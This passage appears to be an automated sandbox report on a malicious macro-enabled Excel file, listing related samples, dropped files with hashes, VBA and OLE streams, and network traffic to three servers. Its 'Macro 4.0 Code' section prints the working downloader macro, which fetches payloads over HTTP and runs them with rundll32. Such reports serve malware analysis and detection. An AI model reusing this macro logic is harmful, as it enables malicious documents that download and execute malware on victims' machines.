              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.248
              9792762096-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
              9486635218-04012021.xlsmGet hashmaliciousBrowse
              • 195.123.210.186
              ASDETUKhttpwwwheficedcomGB71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              71608606512-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              91399367380-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              7225471124-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              7275060031-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              91377263701-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              71911261256-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.244
              9792762096-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243
              9486635218-04012021.xlsmGet hashmaliciousBrowse
              • 45.150.67.243

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB206F33.gif
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:GIF image data, version 89a, 1600 x 1600
              Category:dropped
              Size (bytes):158055
              Entropy (8bit):7.981278766139217
              Encrypted:false
              SSDEEP:3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl
              MD5:CB67CED3017DF7803FBA5D86FCEB4276
              SHA1:C7B8B4A44BDF7F7775F61FCF236A0834CB321733
              SHA-256:C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1
              SHA-512:1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: GIF89a@.@.p..!.......,....@.@.......3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................y..Hp.....*L.p....J.Hq.../j..q.. ?..Ir..(O.L.r..0_.Is...=...y.M..@y.....O.>......D...z.h.L.<e...6..tm....9.......Y.d..]....h...V._.^...kv-.e...6...i.>N..1....C....d.n.}..,..bM_.<:.h.
              C:\Users\user\AppData\Local\Temp\98DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):180499
              Entropy (8bit):7.963755763028083
              Encrypted:false
              SSDEEP:3072:3FqoCdXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGN:3QoChE5SDvbXAyHbVt15wTQDU
              MD5:B7134FBE9AAA0BEC47C04A89CE32402B
              SHA1:932282128C342414F776B356D73473B242F42153
              SHA-256:D7147D9FACC4C33EF81993180FB0EC3CD4180ABD9BD5F724DFCDFBCBD12E6ED1
              SHA-512:46F5E18F66F8EEDA6F863803B3A1295EB842E55F2D2A33D09A8C6C18A50C564BC12FAC1C38500B32772103B2E4C80C44F32D16048B29AB20A59A611C7CDC2463
              Malicious:false
              Reputation:low
              Preview: .U.n.0....?..."..(..r.izl.$...\I....8..wI;vk....E/jgv....fet.........R..N*.5....+.b.Vr.,4d....>~.>.=...mlH....X.=....`q.u.....c....]O&_.p6.Mu..d6..-...[..M'seIu../S5.{.....eK+.Hj.J.t.. 4.>....HFS..2..H..E.r..q..V....X..P....rZ..N..u.d7.w...70(..=..'7..[i...b.....f.X.J...1j......\..j:.T*#+...(.=$../+).#...O}......}.....[./...4./.u<M...V.o??.f.......Z......s......{..c..!...-....}.......>.'....=..M..}....G`.q......y..k.@...]..K..#...S.... .p.2pg........PK..........!.x...............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\91476525608-04012021.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Fri Apr 2 03:31:40 2021, atime=Fri Apr 2 03:31:40 2021, length=180507, window=hide
              Category:dropped
              Size (bytes):2138
              Entropy (8bit):4.515531036164066
              Encrypted:false
              SSDEEP:24:8F/XTm6GreVWUhe8RDv3qldM7dD2F/XTm6GreVWUhe8RDv3qldM7dV:8F/XTFGqkUh4lQh2F/XTFGqkUh4lQ/
              MD5:854699E5720A5035C5D29B93D8498130
              SHA1:02BA57B6504162C7FD82430B52B38053E69AD598
              SHA-256:6F5CC3795442B941B758ED55D0F8DF55EC9F7928D13C89A9FDEE3BD573C5D6B5
              SHA-512:F6B7321A3B2C3E57696D73DEE4E9AF7272C120C1F701DED4C55E238B8BC1C4239F67EDB94E747629B0F7851BD9D2010F2FBFA2BFDCBE3E8BC7D277BE22F2F53F
              Malicious:false
              Reputation:low
              Preview: L..................F.... ........{......y'..#...y'...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.M....R.# .914765~1.XLS..`.......Q.y.Q.y*...8.....................9.1.4.7.6.5.2.5.6.0.8.-.0.4.0.1.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\91476525608-04012021.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.1.4.7.6.5.2.5.6.0.8.-.0.4.0.1.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400.........
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Apr 2 03:31:40 2021, atime=Fri Apr 2 03:31:40 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.498969300062093
              Encrypted:false
              SSDEEP:12:85QMyLgXg/XAlCPCHaX2B8GB/4lX+WnicvbSR9bDtZ3YilMMEpxRljKt2TdJP9TK:85Y/XTm6GYYe6Dv3qlrNru/
              MD5:A88EC9B06635BDFAD6B1230C022126C7
              SHA1:D9C18BCBD3CAA4DDBEA4A1FAE638949CDFC13A39
              SHA-256:DC87C300B6271F0CEF1C0685B24D078200337B7C2030AB55A611706DD51B5814
              SHA-512:6AD187771C486D7E95B9768E8255306AFC7D9DF0E367D50B122C53EF47E74AEE4B1678CEE7AC2FF576ED1885B4600E8430844430526AF97F4C51E6F79565E6DA
              Malicious:false
              Reputation:low
              Preview: L..................F...........7G..#...y'..#...y'... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.#..Desktop.d......QK.X.R.#*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):115
              Entropy (8bit):4.476951246088606
              Encrypted:false
              SSDEEP:3:oyBVomxW4AECl+TEClmxW4AEClv:djUECQTEC9EC1
              MD5:9A8B152F14E864A0442647375EAEF800
              SHA1:F75AE3EA100D77463B10071D490354CE3FAFF74F
              SHA-256:73CA17369F3CDE5E4DA9BACAF17ABF3264FB8EF524E83EE66E236640EF078B72
              SHA-512:4234F266B163E10DE754A42353D1DF1F91BFB348A76BA9C8DEA9EDF242C9D797DDABB3E7E00742C672BD6C4DBC127523D0750C42F54F390A0A6D97054BEE91A2
              Malicious:false
              Reputation:low
              Preview: Desktop.LNK=0..[misc]..91476525608-04012021.LNK=0..91476525608-04012021.LNK=0..[misc]..91476525608-04012021.LNK=0..
              C:\Users\user\Desktop\59DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):180507
              Entropy (8bit):7.963878387347031
              Encrypted:false
              SSDEEP:3072:3FqqOdXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGP:3QqOhE5SDvbXAyHbVt15wTQDK
              MD5:A4810B96CF792356F7222D353E442C37
              SHA1:6DDEA43AC807F019BF5F670315CBE694E26A3477
              SHA-256:4D282DDCEBDB05E5DB27DD4BD8E89DE6323974AA8D7DCFA8B6E46C3ECCA77BCE
              SHA-512:B4899203CC1F2085DE62885E6A5A0956D239FCA546713C6CEB514957562BF1E86240ADBF6E8BAB44D20F9C2DC90E6D994C7E54B83DDC82FBB725B144F35A8F74
              Malicious:false
              Reputation:low
              Preview: .U.n.0....?..."..(..r.izl.$...\I....8..wI;vk....E/jgv....fet.........R..N*.5....+.b.Vr.,4d....>~.>.=...mlH....X.=....`q.u.....c....]O&_.p6.Mu..d6..-...[..M'seIu../S5.{.....eK+.Hj.J.t.. 4.>....HFS..2..H..E.r..q..V....X..P....rZ..N..u.d7.w...70(..=..'7..[i...b.....f.X.J...1j......\..j:.T*#+...(.=$../+).#...O}......}.....[./...4./.u<M...V.o??.f.......Z......s......{..c..!...-....}.......>.'....=..M..}....G`.q......y..k.@...]..K..#...S.... .p.2pg........PK..........!.x...............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\Desktop\~$91476525608-04012021.xlsm
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
              MD5:96114D75E30EBD26B572C1FC83D1D02E
              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
              Malicious:true
              Reputation:high, very likely benign file
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.962528117929017
              TrID:
              • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
              • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
              • ZIP compressed archive (8000/1) 7.58%
              File name:91476525608-04012021.xlsm
              File size:176993
              MD5:e8d0244666daf465e9914a7f56938412
              SHA1:3c5f71752b0cea18b06dfad9a96cdfeb053f45cc
              SHA256:196668480754f95f98c6e59d4776e4f8c756ad3be9fd48a27cfcb50be329567e
              SHA512:d9d9cdfc5eed50798eb3ee4e60b9c5d6a8d7d52dbcce00e17b37681d3f43cd4ee5698b6b2bd1b3978ad24a402ca002b49ed6ef409e30ac8c94d7a503254da476
              SSDEEP:3072:DXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGDKJj:LE5SDvbXAyHbVt15wTQD0KJj
              File Content Preview:PK..........!..D.C............[Content_Types].xml ...(.........................................................................................................................................................................................................

              File Icon

              Icon Hash:e4e2aa8aa4bcbcac

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "/opt/package/joesandbox/database/analysis/380316/sample/91476525608-04012021.xlsm"

              Indicators

              Has Summary Info:False
              Application Name:unknown
              Encrypted Document:False
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Author:Rabota
              Last Saved By:Feriola
              Create Time:2015-06-05T18:19:34Z
              Last Saved Time:2021-04-01T11:57:52Z
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Thumbnail Scaling Desired:false
              Company:
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:16.0300

              Streams with VBA

              VBA File Name: Module1.bas, Stream Size: 948
              General
              Stream Path:VBA/Module1
              VBA File Name:Module1.bas
              Stream Size:948
              Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 31 03 00 00 00 00 00 00 01 00 00 00 d2 b3 f0 e3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

              VBA Code Keywords

              Keyword
              Application.Run
              Attribute
              Auto_Open()
              VB_Name
              Private
              VBA Code

              Streams

              Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 527
              General
              Stream Path:PROJECT
              File Type:ISO-8859 text, with CRLF line terminators
              Stream Size:527
              Entropy:5.31297412231
              Base64 Encoded:True
              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 8 E A 4 4 9 2 4 8 9 2 4 8 9 7 4 D 9 7 4 D " . . D P B = " 3 5 3 7 9 9 A E A B E 6 C 8 E 6 C 8 1
              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 48 65 6c 70 46 69 6c 65 3d 22
              Stream Path: PROJECTwm, File Type: data, Stream Size: 71
              General
              Stream Path:PROJECTwm
              File Type:data
              Stream Size:71
              Entropy:3.95636440452
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
              Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
              Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2555
              General
              Stream Path:VBA/_VBA_PROJECT
              File Type:data
              Stream Size:2555
              Entropy:4.01853324276
              Base64 Encoded:False
              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
              Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
              Stream Path: VBA/dir, File Type: data, Stream Size: 549
              General
              Stream Path:VBA/dir
              File Type:data
              Stream Size:549
              Entropy:6.37926381995
              Base64 Encoded:True
              Data ASCII:. ! . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . = . V b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
              Data Raw:01 21 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 3d c5 56 62 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
              Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
              General
              Stream Path:VBA/\x1051\x1080\x1089\x10901
              File Type:data
              Stream Size:990
              Entropy:3.21290365488
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . n } . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 d2 b3 6e 7d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 1009
              General
              Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
              File Type:data
              Stream Size:1009
              Entropy:3.24479314936
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 39 03 00 00 00 00 00 00 01 00 00 00 d2 b3 f3 e4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

              Macro 4.0 Code

              "=EXEC(""rundll32 ""&""..\Hodas.vyur1""&"",PluginInit"")"=GOTO(Hi!D4)
              ,=NOW(),,,"=NOW()=NOW()=NOW()=FORMULA(""URLDownloadToFileA"",CE271)",,"=CONCATENATE(CC274,CD266,CC273)",,,"=CONCATENATE(CC275,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)",JJCCJJ,"=CONCATENATE(CC276,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)",uRlMon,,"=NOW()=NOW()=NOW()=Belandes(0,CC268,""..\Hodas.vyur"",0,0)",,,"=NOW()=NOW()=NOW()=Belandes(0,CC269,""..\Hodas.vyur1"",0,0)",JJCCBB,"="".dat""","=NOW()=NOW()=NOW()=Belandes(0,CC270,""..\Hodas.vyur2"",0,0)",Belandes,"=""http://45.150.67.243/""",,,"=""http://195.123.210.186/""",,,"=""http://91.211.89.28/""",,,,,,,,,,,,,"=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur""&"",PluginInit"")",,,,,,,,,=GOTO(Jo!E4),,
              "=EXEC(""rundll32 ""&""..\Hodas.vyur2""&"",PluginInit"")"=HALT()

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              04/01/21-21:31:58.735209TCP1201ATTACK-RESPONSES 403 Forbidden804916745.150.67.243192.168.2.22
              04/01/21-21:31:58.949118TCP1201ATTACK-RESPONSES 403 Forbidden8049168195.123.210.186192.168.2.22
              04/01/21-21:31:59.201012TCP1201ATTACK-RESPONSES 403 Forbidden804916991.211.89.28192.168.2.22

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Apr 1, 2021 21:31:58.450840950 CEST4916780192.168.2.2245.150.67.243
              Apr 1, 2021 21:31:58.544945002 CEST804916745.150.67.243192.168.2.22
              Apr 1, 2021 21:31:58.545104980 CEST4916780192.168.2.2245.150.67.243
              Apr 1, 2021 21:31:58.545795918 CEST4916780192.168.2.2245.150.67.243
              Apr 1, 2021 21:31:58.640867949 CEST804916745.150.67.243192.168.2.22
              Apr 1, 2021 21:31:58.735208988 CEST804916745.150.67.243192.168.2.22
              Apr 1, 2021 21:31:58.735383987 CEST4916780192.168.2.2245.150.67.243
              Apr 1, 2021 21:31:58.754887104 CEST4916880192.168.2.22195.123.210.186
              Apr 1, 2021 21:31:58.820130110 CEST8049168195.123.210.186192.168.2.22
              Apr 1, 2021 21:31:58.820208073 CEST4916880192.168.2.22195.123.210.186
              Apr 1, 2021 21:31:58.821412086 CEST4916880192.168.2.22195.123.210.186
              Apr 1, 2021 21:31:58.886327028 CEST8049168195.123.210.186192.168.2.22
              Apr 1, 2021 21:31:58.949117899 CEST8049168195.123.210.186192.168.2.22
              Apr 1, 2021 21:31:58.949312925 CEST4916880192.168.2.22195.123.210.186
              Apr 1, 2021 21:31:58.972136974 CEST4916980192.168.2.2291.211.89.28
              Apr 1, 2021 21:31:59.055402040 CEST804916991.211.89.28192.168.2.22
              Apr 1, 2021 21:31:59.055572987 CEST4916980192.168.2.2291.211.89.28
              Apr 1, 2021 21:31:59.056567907 CEST4916980192.168.2.2291.211.89.28
              Apr 1, 2021 21:31:59.137582064 CEST804916991.211.89.28192.168.2.22
              Apr 1, 2021 21:31:59.201011896 CEST804916991.211.89.28192.168.2.22
              Apr 1, 2021 21:31:59.201190948 CEST4916980192.168.2.2291.211.89.28
              Apr 1, 2021 21:33:03.737008095 CEST804916745.150.67.243192.168.2.22
              Apr 1, 2021 21:33:03.737082958 CEST4916780192.168.2.2245.150.67.243
              Apr 1, 2021 21:33:03.949423075 CEST8049168195.123.210.186192.168.2.22
              Apr 1, 2021 21:33:03.949605942 CEST4916880192.168.2.22195.123.210.186
              Apr 1, 2021 21:33:04.201545954 CEST804916991.211.89.28192.168.2.22
              Apr 1, 2021 21:33:04.201699972 CEST4916980192.168.2.2291.211.89.28
              Apr 1, 2021 21:33:58.330796957 CEST4916980192.168.2.2291.211.89.28
              Apr 1, 2021 21:33:58.331545115 CEST4916880192.168.2.22195.123.210.186
              Apr 1, 2021 21:33:58.332189083 CEST4916780192.168.2.2245.150.67.243
              Apr 1, 2021 21:33:58.399363041 CEST8049168195.123.210.186192.168.2.22
              Apr 1, 2021 21:33:58.410571098 CEST804916745.150.67.243192.168.2.22
